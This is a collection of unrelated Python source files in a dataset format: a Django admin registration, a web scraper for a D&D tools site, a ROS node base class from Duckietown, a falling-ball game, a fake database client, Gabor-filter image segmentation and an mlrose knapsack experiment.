Profile\n\nclass AuthorAdmin(admin.ModelAdmin):\n inlines = [\n PersonInline\n ]\n\n# User modelini baştan yüklemek için önce kaldırmamız gerekiyor.\nadmin.site.unregister(User)\n\nadmin.site.register(User , AuthorAdmin)\nadmin.site.register(SearchWord)\nadmin.site.register(History)\n\n","sub_path":"profiles/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"196563535","text":"from bs4 import BeautifulSoup\nimport urllib2\n\n\"\"\"\nclient = MongoClient('localhost', 27017)\ndb = client.dnd\nitemCollection = db.items\n\"\"\"\n\nbase_url = 'http://dndtools.eu'\nitemURLs = []\nitems = []\n\n\n#finding all of the skill URLs\nreq = urllib2.Request(base_url + '/skills/?page_size=1000')\nres = urllib2.urlopen(req)\nsoup = BeautifulSoup(res.read())\nfor row in soup.findAll('tr'):\n for link in row.findAll('a'):\n itemURL = link.get('href')\n if itemURL.find(\"/skills/\") != -1:\n itemURLs.append(base_url + itemURL)\n\n\n#for string in itemURLs:\n# print(string)\n\n\"\"\"\nfor url in itemURLs:\n req = urllib2.Request(url)\n res = urllib2.urlopen(req)\n soup = BeautifulSoup(res.read())\n curr_item = {}\n tables = soup.findAll(\"table\")\n for row in tables[0].findAll(\"tr\"):\n row_name = \"\"\n row_value = \"\"\n if row.find(\"a\") : \n row_name = row.find('a').text.encode(\"utf-8\")\n else:\n row_name = row.find(\"th\").text.encode(\"utf-8\").replace(\".\", \"\")\n row_value = row.find(\"td\").text.encode(\"utf-8\").replace(\".\", \"\")\n curr_item[row_name] = row_value\n print curr_item[\"Name\"]\n if tables[1].find('p') != None:\n curr_item[\"Description\"] = tables[1].find('p').text\n#itemCollection.insert(curr_item)\n#items.append(curr_item)\n\"\"\"\n\nurl = itemURLs[0]\nreq = urllib2.Request(url)\nres = urllib2.urlopen(req)\nsoup = BeautifulSoup(res.read())\ncurr_item = {}\ntables = soup.findAll(\"table\")\nfor div in tables[0].findAll(\"div\"):\n row_name = \"\"\n row_value = \"\"\n if row.find(\"a\") : \n row_name = row.find('a').text.encode(\"utf-8\")\n else:\n row_name = row.find(\"th\").text.encode(\"utf-8\")\n row_value = row.find(\"td\").text.encode(\"utf-8\")\n curr_item[row_name] = row_value\n \ncurr_item[\"Description\"] = tables[1].find('p').text\n#itemCollection.insert(curr_item) \nitems.append(curr_item)\n","sub_path":"python_troller/skills_html_parser.py","file_name":"skills_html_parser.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"255754357","text":"import inspect\nimport os\nfrom pathlib import Path\nfrom typing import Optional\n\nimport rospy\nimport rospkg\nfrom copy import copy\nimport yaml\n\nfrom std_srvs.srv import SetBool, SetBoolResponse\nfrom duckietown_msgs.srv import (\n NodeGetParamsList,\n NodeGetParamsListResponse,\n NodeRequestParamsUpdate,\n NodeRequestParamsUpdateResponse,\n)\nfrom duckietown_msgs.msg import NodeParameter\nfrom duckietown.dtros.constants import (\n NODE_GET_PARAM_SERVICE_NAME,\n NODE_REQUEST_PARAM_UPDATE_SERVICE_NAME,\n NODE_SWITCH_SERVICE_NAME,\n)\nfrom .dtparam import DTParam\nfrom .constants import NodeHealth, NodeType\nfrom .diagnostics import DTROSDiagnostics\nfrom .utils import get_ros_handler\nfrom .profiler import CodeProfiler\n\n\nclass DTROS(object):\n \"\"\"\n Parent class for all Duckietown ROS nodes\n\n All Duckietown ROS nodes should inherit this class. This class provides\n some basic common functionality that most of the ROS nodes need. By keeping\n these arguments and methods in a parent class, we can ensure consistent and\n reliable behaviour of all ROS nodes in the Duckietown universe.\n\n In particular, the DTROS class provides:\n\n - Logging: By providing utility functions for logging such as `loginfo`, `logwarn`, etc.\n - Shutdown procedure: A common shutdown procedure for ROS nodes.\n - Switchable Subscribers and Publishers: :py:meth:`publisher` and :py:meth:`subscriber` return\n decorated subscribers and publishers that can be dynamically deactivated and reactivated.\n - Node deactivation and reactivation: through requesting ``False`` to the ``~switch``\n service all subscribers and publishers obtained through :py:meth:`publisher`\n and :py:meth:`subscriber` will be deactivated and the ``switch`` attribute will be set\n to ``False``. This switch can be\n used by computationally expensive parts of the node code that are not in callbacks in\n order to pause their execution.\n - We look for a robot specific parameter file and overwrite the default parameters\n if it exists\n\n Every children node should call the initializer of DTROS. This should be done\n by having the following line at the top of the children node ``__init__`` method::\n\n super(ChildrenNode, self).__init__(node_name='children_node_name')\n\n The DTROS initializer will:\n\n - Initialize the ROS node with name ``node_name``\n - Setup the ``node_name`` attribute to the node name passed by ROS (using ``rospy.get_name()``)\n - Add a ``rospy.on_shutdown`` hook to the node's :py:meth:`onShutdown` method\n - Setup a ``~switch`` service that can be used to deactivate and reactivate the node\n\n Args:\n node_name (:obj:`str`): a unique, descriptive name for the ROS node\n node_type (:py:class:`duckietown.dtros.NodeType`): a node type\n help (:obj: `str`): a node description\n dt_ghost (:obj: `bool`): (Internal use only) excludes the node from the diagnostics\n\n Attributes:\n node_name (:obj:`str`): the name of the node\n node_help (:obj:`str`): the description of the node\n node_type (:py:class:`duckietown.dtros.NodeType`): the node type\n is_shutdown (:obj:`bool`): whether the node is shutdown\n\n Properties:\n is_ghost: (:obj:`bool`): (Internal use only) whether the node is a ghost\n switch: (:obj:`bool`): current state of the switch (`true=ON`, `false=OFF`)\n parameters: (:obj:`list`): list of parameters defined within the node\n subscribers: (:obj:`list`): list of subscribers defined within the node\n publishers: (:obj:`list`): list of publishers defined within the node\n\n Service:\n ~switch:\n Switches the node between active state and inactive state.\n\n input:\n data (`bool`): The desired state. ``True`` for active, ``False`` for inactive.\n\n outputs:\n success (`bool`): ``True`` if the call succeeded\n message (`str`): Used to give details about success\n\n \"\"\"\n\n def __init__(\n self,\n node_name,\n # DT parameters from here\n node_type,\n pkg_name=None,\n help=None,\n dt_ghost=False,\n ):\n # configure singleton\n if rospy.__instance__ is not None:\n raise RuntimeError(\"You cannot instantiate two objects of type DTROS\")\n rospy.__instance__ = self\n if not isinstance(node_type, NodeType):\n raise ValueError(\n \"DTROS 'node_type' parameter must be of type 'duckietown.NodeType', \"\n \"got %s instead.\" % str(type(node_type))\n )\n # Initialize the node\n log_level = rospy.INFO\n if os.environ.get(\"DEBUG\", 0) in [\"1\", \"true\", \"True\", \"enabled\", \"Enabled\", \"on\", \"On\"]:\n log_level = rospy.DEBUG\n rospy.init_node(node_name, log_level=log_level, __dtros__=True)\n self.node_name = rospy.get_name()\n self.node_help = help\n self.node_type = node_type\n self.log(\"Initializing...\")\n self.is_shutdown = False\n self._is_ghost = dt_ghost\n self._health = NodeHealth.STARTING\n self._health_reason = None\n self._ros_handler = get_ros_handler()\n\n veh_name = self.node_name.split(\"/\")[1]\n robot_param_file = f\"{self.package_path}/config/{node_name}/{veh_name}.yaml\"\n if os.path.isfile(robot_param_file):\n rospy.loginfo(f\"[{self.package_name}] found robot specific parameter file.. loading\")\n try:\n with open(robot_param_file, \"r\") as stream:\n new_params = yaml.load(stream, Loader=yaml.Loader)\n except yaml.YAMLError:\n msg = f\"[{self.package_name}] Error in parsing calibration file {robot_param_file}.. skipping\"\n rospy.logerr(msg)\n rospy.signal_shutdown(msg)\n for key in new_params:\n rospy.set_param(f\"{node_name}/{key}\", new_params[key])\n\n # Initialize parameters handling\n self._parameters = dict()\n self._rh_paramUpdate = None\n if self._ros_handler is not None:\n # decorate the XMLRPC paramUpdate function\n self._rh_paramUpdate = self._ros_handler.paramUpdate\n setattr(self._ros_handler, \"paramUpdate\", self._param_update)\n\n # Handle publishers, subscribers, and the state switch\n self._switch = True\n self._subscribers = list()\n self._publishers = list()\n # create switch service for node\n self.srv_switch = rospy.Service(\"~%s\" % NODE_SWITCH_SERVICE_NAME, SetBool, self._srv_switch)\n # create services to manage parameters\n self._srv_get_params = rospy.Service(\n \"~%s\" % NODE_GET_PARAM_SERVICE_NAME, NodeGetParamsList, self._srv_get_params_list\n )\n self._srv_request_params_update = rospy.Service(\n \"~%s\" % NODE_REQUEST_PARAM_UPDATE_SERVICE_NAME,\n NodeRequestParamsUpdate,\n self._srv_request_param_update,\n )\n # register node against the diagnostics manager\n if DTROSDiagnostics.enabled():\n DTROSDiagnostics.getInstance().register_node(\n self.node_name, self.node_help, self.node_type, health=self._health\n )\n\n # provide a public interface to the context manager to use as `with self.profiler(\"PHASE\")`\n self.profiler = CodeProfiler()\n\n # mark node as healthy and STARTED\n self.set_health(NodeHealth.STARTED)\n # register shutdown callback\n rospy.on_shutdown(self._on_shutdown)\n\n # Read-only properties for the private attributes\n @property\n def is_ghost(self):\n \"\"\"Whether this is a ghost node (diagnostics will skip it)\"\"\"\n return self._is_ghost\n\n # Read-only properties for the private attributes\n @property\n def switch(self):\n \"\"\"Current state of the node on/off switch\"\"\"\n return self._switch\n\n @property\n def parameters(self):\n \"\"\"List of parameters\"\"\"\n return copy(list(self._parameters.values()))\n\n @property\n def subscribers(self):\n \"\"\"A list of all the subscribers of the node\"\"\"\n return self._subscribers\n\n @property\n def publishers(self):\n \"\"\"A list of all the publishers of the node\"\"\"\n return self._publishers\n\n @property\n def package_path(self) -> Optional[str]:\n \"\"\"The path to the catkin package this node belongs to\"\"\"\n # get all active locations where ROS packages are stored\n ROS_PACKAGE_PATH = os.environ.get(\"ROS_PACKAGE_PATH\", \"\")\n package_paths = ROS_PACKAGE_PATH.split(\":\")\n # get the path to the file containing the child class (whoever is inheriting from this class)\n try:\n child_class_path: str = os.path.realpath(inspect.getfile(self.__class__))\n except Exception as e:\n self.logwarn(f\"Could not determine the file hosting the subclass of DTROS. Error: {str(e)}\")\n return None\n # match the subclass path with the places where packages are stored\n for package_path in package_paths:\n package_path = os.path.realpath(package_path)\n if child_class_path.startswith(package_path):\n # we have a match\n return package_path\n return None\n\n @property\n def package_name(self) -> Optional[str]:\n \"\"\"The name of the catkin package this node belongs to\"\"\"\n package_path = self.package_path\n if not package_path:\n return None\n # the name of the package is simply the name of the directory containing it\n return Path(package_path).stem\n\n def set_health(self, health, reason=None):\n if not isinstance(health, NodeHealth):\n raise ValueError(\n \"Argument 'health' must be of type duckietown.NodeHealth. \"\n \"Got %s instead\" % str(type(health))\n )\n self.log(\"Health status changed [%s] -> [%s]\" % (self._health.name, health.name))\n self._health = health\n self._health_reason = None if reason is None else str(reason)\n # update node health in the diagnostics manager\n if DTROSDiagnostics.enabled():\n DTROSDiagnostics.getInstance().update_node(health=self._health, health_reason=self._health_reason)\n\n def log(self, msg, type=\"info\"):\n \"\"\"Passes a logging message to the ROS logging methods.\n\n Attaches the ros name to the beginning of the message and passes it to\n a suitable ROS logging method. Use the `type` argument to select the method\n to be used (``debug`` for ``rospy.logdebug``,\n ``info`` for ``rospy.loginfo``, ``warn`` for ``rospy.logwarn``,\n ``err`` for ``rospy.logerr``, ``fatal`` for ``rospy.logfatal``).\n\n Args:\n msg (`str`): the message content\n type (`str`): one of ``debug``, ``info``, ``warn``, ``err``, ``fatal``\n\n Raises:\n ValueError: if the ``type`` argument is not one of the supported types\n\n \"\"\"\n full_msg = \"[%s] %s\" % (self.node_name, msg)\n # pipe to the right logger\n if type == \"debug\":\n rospy.logdebug(full_msg)\n elif type == \"info\":\n rospy.loginfo(full_msg)\n elif type == \"warn\" or type == \"warning\":\n self.set_health(NodeHealth.WARNING, full_msg)\n rospy.logwarn(full_msg)\n elif type == \"err\" or type == \"error\":\n self.set_health(NodeHealth.ERROR, full_msg)\n rospy.logerr(full_msg)\n elif type == \"fatal\":\n self.set_health(NodeHealth.FATAL, full_msg)\n rospy.logfatal(full_msg)\n else:\n raise ValueError(\"Type argument value %s is not supported!\" % type)\n\n def loginfo(self, msg):\n self.log(msg, type=\"info\")\n\n def logerr(self, msg):\n self.log(msg, type=\"err\")\n\n def logfatal(self, msg):\n self.log(msg, type=\"fatal\")\n\n def logwarn(self, msg):\n self.log(msg, type=\"warn\")\n\n def logdebug(self, msg):\n self.log(msg, type=\"debug\")\n\n def on_switch_on(self):\n pass\n\n def on_switch_off(self):\n pass\n\n def _srv_switch(self, request):\n \"\"\"\n Args:\n request (:obj:`std_srvs.srv.SetBool`): The switch request from the ``~switch`` callback\n\n Returns:\n :obj:`std_srvs.srv.SetBoolResponse`: Response for successful feedback\n\n \"\"\"\n old_state = self._switch\n self._switch = new_state = request.data\n # propagate switch change to publishers and subscribers\n for pub in self.publishers:\n pub.active = self._switch\n for sub in self.subscribers:\n sub.active = self._switch\n # tell the node about the switch\n on_switch_fcn = {False: self.on_switch_off, True: self.on_switch_on}[self._switch]\n on_switch_fcn()\n # update node switch in the diagnostics manager\n if DTROSDiagnostics.enabled():\n DTROSDiagnostics.getInstance().update_node(enabled=self._switch)\n # create a response to the service call\n msg = \"Node switched from [%s] to [%s]\" % (\"on\" if old_state else \"off\", \"on\" if new_state else \"off\")\n # print out the change in state\n self.log(msg)\n # reply to the service call\n response = SetBoolResponse()\n response.success = True\n response.message = msg\n return response\n\n def _srv_get_params_list(self, request):\n \"\"\"\n Args:\n request (:obj:`duckietown_msgs.srv.NodeGetParamsList`): Service request message.\n\n Returns:\n :obj:`duckietown_msgs.srv.NodeGetParamsList`: Parameters list\n\n \"\"\"\n return NodeGetParamsListResponse(\n parameters=[\n NodeParameter(\n node=rospy.get_name(), name=p.name, help=p.help, type=p.type.value, **p.options()\n )\n for p in self.parameters\n ]\n )\n\n def _srv_request_param_update(self, request):\n \"\"\"\n Args:\n request (:obj:`duckietown_msgs.srv.NodeRequestParamsUpdate`): Service request message.\n\n Returns:\n :obj:`duckietown_msgs.srv.NodeRequestParamsUpdate`: Success feedback\n\n \"\"\"\n try:\n self._parameters[request.parameter].force_update()\n return NodeRequestParamsUpdateResponse(success=True)\n except (KeyError, rospy.exceptions.ROSException):\n return NodeRequestParamsUpdateResponse(success=False)\n\n def _param_update(self, *args, **kwargs):\n # call super method\n if self._rh_paramUpdate is not None:\n self._rh_paramUpdate(*args, **kwargs)\n # check data\n if len(args) < 3:\n self.logdebug(\"Received invalid paramUpdate call from Master\")\n return\n # get what changed\n _, param_name, param_value = args[:3]\n param_name = param_name.rstrip(\"/\")\n self.logdebug('Received paramUpdate(\"%s\", %s)' % (param_name, str(param_value)))\n # update parameter value\n if param_name in self._parameters:\n self._parameters[param_name].set_value(param_value)\n self.loginfo(\n 'Parameter \"%s\" has now the value [%s]'\n % (param_name, str(self._parameters[param_name].value))\n )\n\n def _add_param(self, param):\n if not isinstance(param, DTParam):\n raise ValueError(\"Expected type duckietown.DTParam, got %s instead\" % str(type(param)))\n self._parameters[param.name] = param\n\n def _has_param(self, param):\n return rospy.names.resolve_name(param) in self._parameters\n\n def _register_publisher(self, publisher):\n self._publishers.append(publisher)\n\n def _register_subscriber(self, subscriber):\n self._subscribers.append(subscriber)\n\n def _on_shutdown(self):\n self.log(\"Received shutdown request.\")\n self.is_shutdown = True\n # call node on_shutdown\n self.on_shutdown()\n\n def on_shutdown(self):\n # this function does not do anything, it is called when the node shuts down.\n # It can be redefined by the user in the final node class.\n pass\n","sub_path":"packages/duckietown/include/duckietown/dtros/dtros.py","file_name":"dtros.py","file_ext":"py","file_size_in_byte":16276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"272308900","text":"\"\"\"\nCreate a dodging game.\nEllipses will start at the top of the screen and \nfall downwards. \n\nThe Player controls the movement of an ellipse \nat the bottom of the screen using the mouse.\n\nThe player must dodge the falling ball\n\nSteps:\n 1. Create an ellipse with its own \n position variables. Draw it in the draw() function\n This will be the falling ball.\n 2. Make this ball \"fall\" by giving it a y-speed.\n Update its location in the draw() function.\n Also give it an x-speed, but keep it at 0\n (unless you want to mess around a bit).\n 3. When the ball hits the bottom of the screen,\n reset its position to the top of the window.\n You can assign the x-position to a random value.\n Maybe even assign the y-speed to a random value \n as well. Also, possibly create a second falling \n ball.\n 4. Create the PLAYER ellipse with its own position\n variables. The position of the PLAYER will update\n every draw loop. In the draw loop, bind the \n x-location variable to the mouseX variable.\n Keep this ball at the bottom of the screen. \n Draw this ball in the draw() function.\n This will be the player.\n 5. Whenever the ball hits the bottom, add +1 to a score\n variable. Draw this score with the text() function.\n 6. In the draw() function determine if the two\n ellipses are touching:\n a) Use pythagorean theorem to find out the \n distance (hypotenuse) between the two origins.\n b) check to see if the distance is less than \n the two ellipse radii. (Radiuses)\n 7. Whenever the falling ellipses touch the player, \n reset the score.\n\"\"\"\nball_1_pos_x = 0\nball_1_pos_y = 0\nball_1_speed_x = 0\nball_1_speed_y = 3 # moving 3 pixels per frame\nball_1_size = 40\n\nplayer_pos_x = 0\nplayer_pos_y = 0\nplayer_size = 40\n\nbackground_color = color(39, 76, 119)\nprimary_color = color(96, 150, 186)\nsecondary_color = color(163, 206, 241)\n\nscore = 0\n\ndef setup():\n size(400, 600)\n \ndef draw():\n global ball_1_pos_x\n global ball_1_pos_y\n global ball_1_speed_x\n global ball_1_speed_y\n global score\n \n # Update ball 1's location\n ball_1_pos_y += ball_1_speed_y\n \n # Update player position based on mouse\n player_pos_x = mouseX\n player_pos_y = height - player_size/2\n \n if ball_1_pos_y > height:\n ball_1_pos_y = 0\n ball_1_pos_x = random(0, width)\n score += 1\n \n # Collision detection.\n # Using pythagorean theroem\n radius_ball_1 = ball_1_size/2\n radius_player = player_size/2\n a = ball_1_pos_x - player_pos_x\n b = ball_1_pos_y - player_pos_y\n distance = sqrt(a**2 + b**2) # hypotenuse of the R-A triangle\n if distance <= radius_ball_1 + radius_player:\n score = 0\n ball_1_pos_y = 0\n ball_1_pos_x = random(0, width)\n \n background(background_color) # Remove streaking\n \n #Draw ball 1\n noStroke()\n fill(secondary_color)\n ellipse(ball_1_pos_x, ball_1_pos_y, ball_1_size, ball_1_size)\n \n # Draw score\n fill(primary_color)\n textSize(40)\n textAlign(LEFT)\n text(score, 20, 50)\n \n # Draw Player\n fill(primary_color)\n ellipse(player_pos_x, player_pos_y, player_size, player_size)\n","sub_path":"games/falling_ball_game/falling_ball_game_solution.pyde","file_name":"falling_ball_game_solution.pyde","file_ext":"pyde","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"249763835","text":"# the class structure used for the User in the Mongo database\ntools_list = [{\n \"_id\": {\n \"$oid\": \"58e5528dbf24551abe30660f\"\n },\n \"current_user\": {\n \"$oid\": \"58ebabe3638acc000b2e2429\"\n },\n \"name\": \"screwdriver\",\n \"alternate_names\": [],\n \"current_due_date\": 1492100080\n}, {\n \"_id\": {\n \"$oid\": \"58e5528dbf24551abe306610\"\n },\n \"current_due_date\": 1491424505,\n \"name\": \"drill\",\n \"alternate_names\": [],\n \"current_user\": {\n \"$oid\": \"58dfe761db78bb000bf7c88b\"\n }\n}, {\n \"_id\": {\n \"$oid\": \"58e5528dbf24551abe306611\"\n },\n \"name\": \"arduino\",\n \"alternate_names\": [],\n \"current_due_date\": None,\n \"current_user\": None\n}]\n\nusers_list = [{\n \"_id\": {\n \"$oid\": \"58ebabe3638acc000b2e2429\"\n },\n \"sender_id\": \"1346430625424620\",\n \"tools\": [{\n \"$oid\": \"58e5528dbf24551abe30660f\"\n }],\n \"stage\": 0,\n \"temp_tools\": []\n}]\n\n\nclass User(object):\n def __init__(self, sender_id):\n self.sender_id = sender_id\n self.tools = []\n self.temp_tools = []\n self.stage = 0\n\n\nclass FakeDatabaseClient(object):\n \"\"\"A client which connects to Mongo and deals with Mongo database operations.\"\"\"\n\n def get_all_users(self):\n \"\"\"Fake version of get_all_users.\"\"\"\n return users_list\n\n def get_all_tools(self):\n \"\"\"Fake version of get_all_tools.\"\"\"\n return tools_list\n\n def find_user(self, field_name, field_value):\n \"\"\"Fake version of find_user.\"\"\"\n return None\n\n def find_user_by_sender_id(self, sender_id):\n \"\"\"Fake version of find_user_by_sender_id.\"\"\"\n return None\n\n def find_or_create_user(self, sender_id, name):\n \"\"\"Fake version of find_or_create_user.\"\"\"\n return users_list[0]\n\n def update_user(self, updated_user):\n \"\"\"Update a user in the database.\n\n Given an updated user dictionary with the same sender_id,\n replaces the old database entry with the new one\n \"\"\"\n sender_id = updated_user['sender_id']\n self.users.find_one_and_replace({\"sender_id\": sender_id}, updated_user)\n\n def find_tool_by_name(self, name):\n \"\"\"Find a tool by searching on the name field.\"\"\"\n return None\n # return self.tools.find_one({'name':name})\n\n def find_tool_by_id(self, tool_id):\n \"\"\"Find a tool by searching on the id field.\"\"\"\n return None\n # return self.tools.find_one({'_id':tool_id})\n\n def update_tool(self, updated_tool):\n \"\"\"Update a tool in the database.\n\n Given an updated tool dictionary with the same _id,\n replaces the old database entry with the new one\n \"\"\"\n return None\n # self.tools.find_one_and_replace({\"_id\":updated_tool['_id']}, updated_tool)\n","sub_path":"fake_database_client.py","file_name":"fake_database_client.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"489725173","text":"\n\n#calss header\nclass _IONOSPHERE():\n\tdef __init__(self,): \n\t\tself.name = \"IONOSPHERE\"\n\t\tself.definitions = [u\"the part of the earth's atmosphere, from about 60 kilometres to about 1,000 kilometres above the surface, in which there are many ions\"]\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_ionosphere.py","file_name":"_ionosphere.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"537080364","text":"'''Given a natural number n, we want to know in how many ways we may express these numbers as product of other numbers'''\n\ndef prod_int_part(n): # n the integer to be partitioned in products\n ways =0\n factors=[]\n \n while count < n/2:\n factor = 2\n if n%factor==0:\n factors.append[factor]\n count +1\n return factors\n\n\n \n #return [(1), [(2)]] # (1) - Amount of different products equals to n\n # (2) - List of list - products that have maximum length sorted\n # (if there is only one list, do not use two levels of braces)\n\n\n\ndef main():\n number = 18\n factors = prod_int_part(number)\n\n print (factors)\n\nif __name__ == \"__main__\":\n main()","sub_path":"Python Januray 2020/ProductPartitions.py","file_name":"ProductPartitions.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"69318540","text":"import numpy as np\nimport cv2\nfrom PIL import Image\nimport scipy\nimport skimage.exposure as exposure\n\n\nclass SegmentationGabor:\n\n def __init__(self,matImg,csize=50, lsize=50, thetaMin=-0.4, thetaMax=0.45, pasTheta=0.2, sigma=2, gamma=5, lambdaMin=6,lambdaMax=15,pasLambda=2, psi=0,dossierSaveImgSeg = None,dossierSaveKernel=None):\n\n self.matImg = matImg\n self.csize = csize\n self.lsize = lsize\n self.thetaMin = thetaMin\n self.thetaMax = thetaMax\n self.pasTheta = pasTheta\n self.sigma = sigma\n self.gamma = gamma\n self.lambdaMin = lambdaMin\n self.lambdaMax = lambdaMax\n self.pasLambda = pasLambda\n self.psi = psi\n self.dossierSaveImgSeg = dossierSaveImgSeg\n self.dossierSaveKernel = dossierSaveKernel\n self.filters = None\n\n def gabor(self, imgG, csize, lsize, thetaMin, thetaMax, pasTheta, sigma, gamma, lambdaMin, lambdaMax, pasLambda,\n psi):\n \"\"\"\n Main fonction, call buildfilter anc process\n :return: \n \"\"\"\n if self.filters == None:\n self.build_filters(csize, lsize, thetaMin, thetaMax, pasTheta, sigma, gamma, lambdaMin, lambdaMax,pasLambda, psi)\n res1 = self.process(imgG, self.filters)\n return res1\n\n def build_filters(self,csize,lsize,thetaMin,thetaMax,pasTheta,sigma,gamma,lambdaMin,lambdaMax,pasLambda,psi):\n \"\"\"\n Builds gabor filter\n :return: A list with the gabor filter\n \"\"\"\n filters = []\n for lambd in np.arange(lambdaMin,lambdaMax,pasLambda):\n for theta in np.arange(thetaMin, thetaMax, pasTheta):\n kern = cv2.getGaborKernel((lsize, csize), sigma*(lambd/3), theta, lambd, gamma, psi, ktype=cv2.CV_64F)\n filters.append(kern/1.5)\n self.filters = filters\n\n\n def process(self,img,filters):\n \"\"\"\n Convolution of each gabor filter\n :param img: a matrix which represents a picture\n :param filters: a list of matrix which represents gabor filters\n :return: The response of the convolution \n \"\"\"\n for kern in filters:\n fimg = cv2.filter2D(img, cv2.CV_8UC3, kern)\n return fimg\n\n\n def segmentation(self):\n \"\"\"\n Segmentation of a image\n :param matImg: a matrix which reresents an image\n :return: a mask which represent the segmentation. 1 means the algorithm detect a striation, \n \"\"\"\n #pre-traitement\n matImg2 = self.matImg[:,:,0]\n matImg2 = exposure.equalize_adapthist(matImg2)*255 # egalisation local du contraste\n # matImg2 = HPF(matImg2,2)\n #gabor\n imgSeg = self.gabor(matImg2,self.csize,self.lsize,self.thetaMin,self.thetaMax,self.pasTheta,self.sigma,self.gamma,self.lambdaMin,self.lambdaMax,self.pasLambda,self.psi)\n ret, imgSeg = cv2.threshold(imgSeg, 254, 255, cv2.THRESH_BINARY)\n # Image.fromarray(imgSeg*7000).show()\n #self.matImg[:,:,2] = imgSeg\n if ( self.dossierSaveImgSeg != None):\n Image.fromarray(self.matImg).save(self.dossierSaveImgSeg+\".png\")\n #application de flou\n imgSeg = cv2.blur(imgSeg, (27, 30), 5)\n #open\n kernel = np.ones((31, 51), np.uint8)\n imgSeg = cv2.morphologyEx(imgSeg, cv2.MORPH_OPEN, kernel)\n return self.inverseMatBin(self.conversionBinaire(imgSeg))\n\n\n def conversionBinaire(self,img):\n \"\"\"\n Convert a matrix into a binary matrix\n :param img: a int matrix \n :return: a binary matrix\n \"\"\"\n imarray = np.array(img) # image to np array\n imarray = scipy.sign(imarray) # binarize\n imarray = np.floor(abs(imarray - np.ones(imarray.shape))) #inversion 1 -> 0, 0-> 1\n imarray = imarray.astype(int) # convertie en int\n return imarray\n\n\n def paramToString(self):\n return self.thetaMin.__str__() + \" \" + self.thetaMax.__str__() + \" \" + self.pasTheta.__str__() + \" \" + self.sigma.__str__() + \" \" + self.gamma.__str__() + \" \" + self.lambdaMin.__str__() + \" \" + self.lambdaMax.__str__() + \" \" + self.pasLambda.__str__() + \" \" + self.psi.__str__()\n\n #Segmentation.py\n\n\n def inverseMatBin(self,mat):\n \"\"\"\n Create the inverse of a binary matrix, 0 become 1, 1 become 0\n :param mat: a binary matrix\n :return: a binary matrix\n \"\"\"\n return (abs(mat - np.ones(mat.shape))).astype(int)\n\n def kMeans(img,k):\n '''\n Applique la méthode des k-means sur une image pour la segmenter\n @param img: image à traiter (créer précédemment grâce à \"imread()\")\n @param k: nombre de clusters\n @return: l'image après traitement\n '''\n # convert to np.float32\n res = img.reshape((-1, 3))\n res = np.float32(res)\n\n # define criteria, number of clusters(K) and apply kmeans()\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)\n ret, label, center = cv2.kmeans(res, k, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)\n\n # Now convert back into uint8, and make original image\n center = np.uint8(center)\n res = center[label.flatten()]\n res = (res/np.min(res))-1 # normaliser à 0\n res = scipy.sign(res) # Binarisation\n res = res * 255 # pour afficher en noir blanc\n res2 = res.reshape((img.shape))\n return res2\n","sub_path":"Model/SegmentationGabor.py","file_name":"SegmentationGabor.py","file_ext":"py","file_size_in_byte":5425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"44725192","text":"import mlrose as ml\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\nweights = [10, 5, 2, 8, 15,10,5,5, 10,3,10,12,15,8,4,15,7,10,14,2,5,20,4,23,12,5,4,8,9,7,10,5,5,8,5,7,2,4,14,5,6,15,12,11,3,13,15,17,8,10]\nvalues = [1, 2, 3,5,4,6,9,12,1,5,6,14,6,8,1,4,5,7,7,8,3,7,3,7,6,9,12,4,6,3,3,3,3,8,6,9,3,2,3,6,8,3,5,7,5,6,9,1,12,6]\n# weights = [10, 5, 2, 8, 15,10,5,5, 10,3,10,12,15,8,4,15,7,10,14,2,5,20,4,23,12,5,13,14,6,9,3,20,2,6,4,15,11,13,12,14,13,15,16,5,14,19,5,9,6,4,5,6,3,9,2,7,4,6,74,1,2,4,6,3,6,4,7,4,10,11,5,3,19,11,5,4,6,3,2,13,2,5,5,8,5,7,2,4,14,5,6,15,12,11,3,13,15,17,8,10]\n# values = [1, 2, 3, 5,4,6,9,12,1,5,6,14,6,8,1,4,5,7,7,8,3,7,3,7,6,9,12,4,6,3,3,3,3,8,6,9,3,2,3,6,8,3,5,7,1,12,6,5,6,3,4,10,12,4,5,4,7,6,12,2,4,5,12,5,3,5,6,7,2,19,11,5,3,1,6,9,8,11,10,2,12,14,11,13,3,4,5,8,9,3,4,4,4,1,2,15,16,11,4,4]\n\nfitness = ml.Knapsack(weights, values, 0.5)\nproblem = ml.DiscreteOpt(length=50, fitness_fn=fitness, maximize=True, max_val=2)\n\nbest_state, best_fitness, fitness_curve = ml.random_hill_climb(problem, max_attempts = 100, max_iters=5000,restarts=40, curve=True)\nprint(best_fitness)\nplt.plot(fitness_curve)\nplt.show()\n\n# init_state = np.random.randint(2, size=50)\nschedule = ml.ExpDecay()\n# ##rhc\nbest=[]\nfor r in range(0,20,2):\n best_state, best_fitness, fitness_curve = ml.random_hill_climb(problem, max_attempts = 100, max_iters=5000,restarts=r, curve=True)\n # plt.plot(fitness_curve)\n best.append(best_fitness)\nbest=np.array(best)\nplt.figure()\nplt.plot(np.arange(0,20,2),best)\nplt.xlabel('number 